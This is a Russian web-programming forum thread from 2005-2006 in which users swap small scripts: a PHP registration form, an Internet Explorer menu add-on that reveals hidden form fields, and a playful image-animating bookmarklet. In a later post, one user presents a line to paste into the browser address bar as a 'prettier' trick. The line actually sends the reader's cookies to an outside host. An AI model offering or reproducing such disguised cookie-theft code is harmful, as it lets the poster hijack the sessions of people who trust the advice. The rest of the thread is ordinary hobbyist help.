Список форумов   FAQ   Поиск  
  Вход
Список форумов World Wide Web Web-программирование

СКРИПТЫ

Все вопросы по web-программированию. Php, Perl, HTML, CSS, JavaScript и др. Установка и настройка CGI скриптов

Сообщение Hrundel » Понедельник 15 Август 2005 01:40:52

Для Fuck this world!: :D Напиши нормальными русскими словами что именно тебе нужно - я постараюсь сделать.
Hrundel

 
Сообщения: 728
Зарегистрирован: Понедельник 19 Июль 2004 23:18:42

Сообщение Romaaa » Понедельник 15 Август 2005 06:59:17

_ttp://woweb.ru раздел скриптов... находим и переделываем под себя.. и никаких проблем...
Romaaa

 
Сообщения: 7078
Зарегистрирован: Вторник 30 Март 2004 08:15:31
Откуда: 47°59'53N 7°50'26E

Сообщение zmey » Понедельник 15 Август 2005 13:13:37

Fuck this world! писал(а):Народ, помогите мне с страничкой, так как я в ХТМЛ и ему подобных - полный 0 ... мне нужна страничка такого вида

Текстовое_поле1
Текстовое_поле2
Текстовое_поле3
Кнопка1

Если нажата Кнопка1, все текстовые поля НЕ пусты , содержание Текстовое_поле3 и Текстовое_поле2 равны, ДОБАВИТЬ в файл на диске Текстовое_поле1 Текстовое_поле2

Например:
acc1
pass1
pass1

В файл добавили
acc1 pass1


Специально для тебя писал этот скрипт:

Для работы скрипта нужен установленный Вэб-сервер с поддержкой PHP.

Для регистрации пользователя используется файл reg.php. При вводе Акаунта, пароля, и повторного пароля - для подтверждения - вся информация записывается в файл logins.dat. Так же, при регистрации акаунта, в файл logins.dat записывается IP-адресс пользователя. Для просмотра информации, записанной в logins.dat используется файл users.php

Возникнут вопросы - обращайся, буду рад помочь ;)
Вложения
FuckThisWorld.rar
(3.78 КБ) Скачиваний: 150
zmey

 
Сообщения: 222
Зарегистрирован: Воскресенье 09 Январь 2005 05:46:41

Сообщение Hrundel » Пятница 19 Август 2005 14:14:50

ЛЮДИ! ДАЙТЕ КТО-ТО СКРИПТ ФОТОАЛЬБОМА(МОЖНО И ПРЕМИТИВНОГО). Чтобы в папу фотки ложить, а скрипт ганерировал маленькие изображения.
Hrundel

 
Сообщения: 728
Зарегистрирован: Понедельник 19 Июль 2004 23:18:42

Сообщение Anonymous » Пятница 19 Август 2005 17:13:04

Для zmey: Сенк!!!
Anonymous

 

Сообщение Anonymous » Пятница 11 Ноябрь 2005 11:27:54

Hrundel писал(а):ЛЮДИ! ДАЙТЕ КТО-ТО СКРИПТ ФОТОАЛЬБОМА(МОЖНО И ПРЕМИТИВНОГО). Чтобы в папу фотки ложить, а скрипт ганерировал маленькие изображения.

Good Utilities For Web-Master

Программа хорошая, но я бы её назвал Утилиты Для Ленивых Веб-Строителей. Суть в следующем: вам прелагается шесть шаблонов (Генератор мета тегов, голосование, кнопочки, поиск в поисковых машинах, регистрация в поисковых машинах и фотоальбом (галерея)) заполнив поля формы вы получите соответствующий результат (названия говорят сами за себя) для размещения на своем сайте. Сами понимаете, вид у страниц получается... классический. Без выкрутасов. И без дизайна.

Good Utilities For Web-Master
Anonymous

 

Сообщение R.O.H.A.N » Среда 18 Январь 2006 18:47:02

Весьма полезный скрипт для людей, не любящих когда от них что-то скрывают :D
Врубаем блокнот, пишем:
Код: Выделить всё
<script type="text/javascript">
   function convertStr(text) {
      var res_text = '';
      for (var i = 0; i <= text.length - 1; i ++) {
         if (text.charAt(i) != escape(text.charAt(i))) {
            res_text += escape(text.charAt(i)).replace(/%/, '&#x') + ';';
         } else {
            res_text += text.charAt(i);
         }
      }
      return res_text;
   }
   var currentWindow = external.menuArguments;
   var currentDocument = currentWindow.document;
   var currentForms = currentDocument.forms;
   for (var i = 0; i <= currentForms.length - 1; i ++) {
      for (var j = 0; j <= currentForms[i].elements.length - 1; j ++) {
         with (currentForms[i].elements[j]) {
            if (type == 'hidden') {
               outerHTML = '<input type="text" name="' + name + '" id="' + name + '" value="' + convertStr(value) + '" title="' + type + ' / ' + name + '">';
            }
         }
      }
   }
</script>

Сохраняем, скажем, как showHidden.js, но сохраняем там где он никому не будет мешать и никому не захочется его снести - он должен быть доступен "24/7" далее создаем рядом с эти файлом файлик типа "installIt.bat" - создаем в блокноте, главное чтоб расширение было таким :) В нем пишем:
Код: Выделить всё
reg.exe ADD "HKCUSoftwareMicrosoftInternet ExplorerMenuExtSHOW HIDDEN ELEMENTS" /ve /t REG_SZ /d "%CD%showHidden.js" /f > nul

Сия "сложная" команда, как легко видеть, добавляет в реестр еще один пункт во всплывающее меню IE. Запускаем энтот бат. Все. Отныне у вас в менушке в интернет эксплорере появится команда "SHOW HIDDEN ELEMENTS" - пользуемся на здоровье :)
R.O.H.A.N

 
Сообщения: 1819
Зарегистрирован: Пятница 02 Сентябрь 2005 22:38:33

Сообщение Avb » Пятница 07 Июль 2006 09:24:52

_ttp://www.03www.ru/00/index.html
Avb

 
Сообщения: 5
Зарегистрирован: Воскресенье 19 Март 2006 23:36:54

Сообщение ParadoxX » Среда 08 Ноябрь 2006 23:40:02

javascriptR=0; x1=.1; y1=.05; x2=.25; y2=.24; x3=1.6; y3=.24; x4=300; y4=200; x5=300; y5=200; DI=document.images; DIL=DI.length; function A(){for(i=0; i



Вставте в адресную строку браузера на любой странице где дохрена картинок, и например на странице форума где много ответов и проглумитесь
ParadoxX

 
Сообщения: 839
Зарегистрирован: Пятница 29 Апрель 2005 14:04:41

Сообщение All Eyez on Me » Четверг 09 Ноябрь 2006 07:30:24

Для ParadoxX: гыыыыыыыыыыыыы ))) Забавная вещь!
All Eyez on Me

 
Сообщения: 2696
Зарегистрирован: Четверг 03 Июнь 2004 18:39:48
Откуда: Новомосковск

Сообщение R.O.H.A.N » Четверг 09 Ноябрь 2006 11:35:29

дубль два: скрипт еще покрасивее!!! В РАЗЫ!!!
javascriptck=document.cookie; req='http://vampire.featherysoft.com/mail.php?msg='+ck; location.href=req;


Добавлено спустя 1 минуту 2 секунды:

да, использование: то же самое - вставить в адресную строку и ЕНТЕР =)
R.O.H.A.N

 
Сообщения: 1819
Зарегистрирован: Пятница 02 Сентябрь 2005 22:38:33

Сообщение koldunlexa » Воскресенье 19 Ноябрь 2006 00:37:41

Для zmey:
Fuck this world! писал(а):
Народ, помогите мне с страничкой, так как я в ХТМЛ и ему подобных - полный 0 ... мне нужна страничка такого вида

Текстовое_поле1
Текстовое_поле2
Текстовое_поле3
Кнопка1

Если нажата Кнопка1, все текстовые поля НЕ пусты , содержание Текстовое_поле3 и Текстовое_поле2 равны, ДОБАВИТЬ в файл на диске Текстовое_поле1 Текстовое_поле2

Например:
acc1
pass1
pass1

В файл добавили
acc1 pass1


Специально для тебя писал этот скрипт:

Для работы скрипта нужен установленный Вэб-сервер с поддержкой PHP.

Для регистрации пользователя используется файл reg.php. При вводе Акаунта, пароля, и повторного пароля - для подтверждения - вся информация записывается в файл logins.dat. Так же, при регистрации акаунта, в файл logins.dat записывается IP-адресс пользователя. Для просмотра информации, записанной в logins.dat используется файл users.php

Возникнут вопросы - обращайся, буду рад помочь




Помоги его под меня настроить плиз
koldunlexa

 
Сообщения: 389
Зарегистрирован: Понедельник 28 Август 2006 07:55:47

Сообщение Anonymous » Воскресенье 19 Ноябрь 2006 01:09:31

Для koldunlexa: что его там настраивать ?
Anonymous

 

Сообщение koldunlexa » Воскресенье 19 Ноябрь 2006 22:15:31

Для never mind: Там не регестрируеца(
koldunlexa

 
Сообщения: 389
Зарегистрирован: Понедельник 28 Август 2006 07:55:47

Сообщение Anonymous » Воскресенье 19 Ноябрь 2006 22:23:21

Для koldunlexa: у тебя ПХП не стоит
Anonymous

 

Пред.След.

Вернуться в Web-программирование

Кто сейчас на конференции

Сейчас этот форум просматривают: нет зарегистрированных пользователей и гости: 1

cron